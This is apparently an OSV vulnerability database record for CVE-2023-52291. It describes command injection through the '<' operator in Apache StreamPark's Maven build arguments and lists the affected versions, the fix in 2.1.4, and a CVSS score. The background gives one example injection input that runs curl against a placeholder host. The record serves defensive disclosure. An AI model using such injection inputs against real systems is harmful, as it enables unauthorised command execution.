{"id":"CVE-2023-52291","details":"In StreamPark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the StreamPark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nBackground:\n\nIn the \"Project\" module, the \"\u003c\" operator in the Maven build args causes command injection. For example, \"\u003c (curl http://xxx.com )\" will be executed as a command injection.\n\nMitigation:\n\nAll users should upgrade to 2.1.4. The \"\u003c\" operator will be blocked.","aliases":["GHSA-7g94-hfqc-q993"],"modified":"2026-03-14T14:54:57.013070Z","published":"2024-07-17T09:15:02.410Z","references":[{"type":"ARTICLE","url":"http://www.openwall.com/lists/oss-security/2024/07/17/1"},{"type":"ARTICLE","url":"https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/apache/incubator-streampark","events":[{"introduced":"6788ebae61d2f6d5122572229ce0a3a2555cc46d"},{"fixed":"c3c468c9192dd87b4ae430a41735bde7a391dfba"}],"database_specific":{"versions":[{"introduced":"2.0.0"},{"fixed":"2.1.4"}]}}],"versions":["v2.0.0","v2.0.0-rc7","v2.1.0","v2.1.0-rc1","v2.1.1","v2.1.1-rc1","v2.1.2","v2.1.2-rc1","v2.1.2-rc2","v2.1.2-rc3","v2.1.2-rc4","v2.1.3","v2.1.3-rc1","v2.1.4-rc1"],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2023-52291.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"}]}